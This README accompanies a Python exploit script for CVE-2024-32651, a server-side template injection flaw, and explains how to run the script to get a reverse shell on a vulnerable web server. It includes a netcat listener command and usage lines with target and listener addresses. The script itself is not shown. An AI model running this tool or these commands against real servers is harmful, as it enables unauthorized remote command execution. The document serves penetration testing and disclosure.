Server-Side Template Injection Exploit!!
Remote Code Execution via Server-Side Template Injection (SSTI) in Vulnerable Web Application
This exploit targets a web application vulnerable to Server-Side Template Injection (SSTI). By exploiting this vulnerability, an attacker can execute arbitrary commands on the server. The provided Python script automates the exploitation process by submitting a payload that triggers a reverse shell.
- CVE ID: CVE-2024-32651
- Affected Systems: Web applications that are exposed to Server-Side Template Injection (SSTI) and have a vulnerable configuration.
To reproduce the vulnerability, execute the provided Python script against the vulnerable web application. Ensure that you have a listener (e.g., `nc -lvp 9999`) running to capture the reverse shell connection.
- Save the script to a file named `CVE-2024-32651.py`.
- Install the required Python libraries if not already installed:
  ```
  pip install requests beautifulsoup4
  ```
- To use the script, provide the following command-line arguments:
  - `--url`: Base URL of the vulnerable web application (e.g., `http://10.10.10.10:5000`).
  - `--port`: Port for the listener (e.g., `9999`).
  - `--ip`: IP address of the listener (e.g., `10.10.50.22`).
  - `--notification`: (Optional) Notification URL if you want to use a specific notification URL.
- Run the script using Python 3 with the required arguments. The syntax is:
  ```
  python3 CVE-2024-32651.py --url http://<TARGET_URL> --port <LISTENER_PORT> --ip <LISTENER_IP> [--notification <NOTIFICATION_URL>]
  ```
This fixed version of the exploit was based on an original exploit published by Zach Crosman (zcrosman) with EDB-ID: 52027. You can view the original exploit here. I thank Zach Crosman for his contribution to the security community.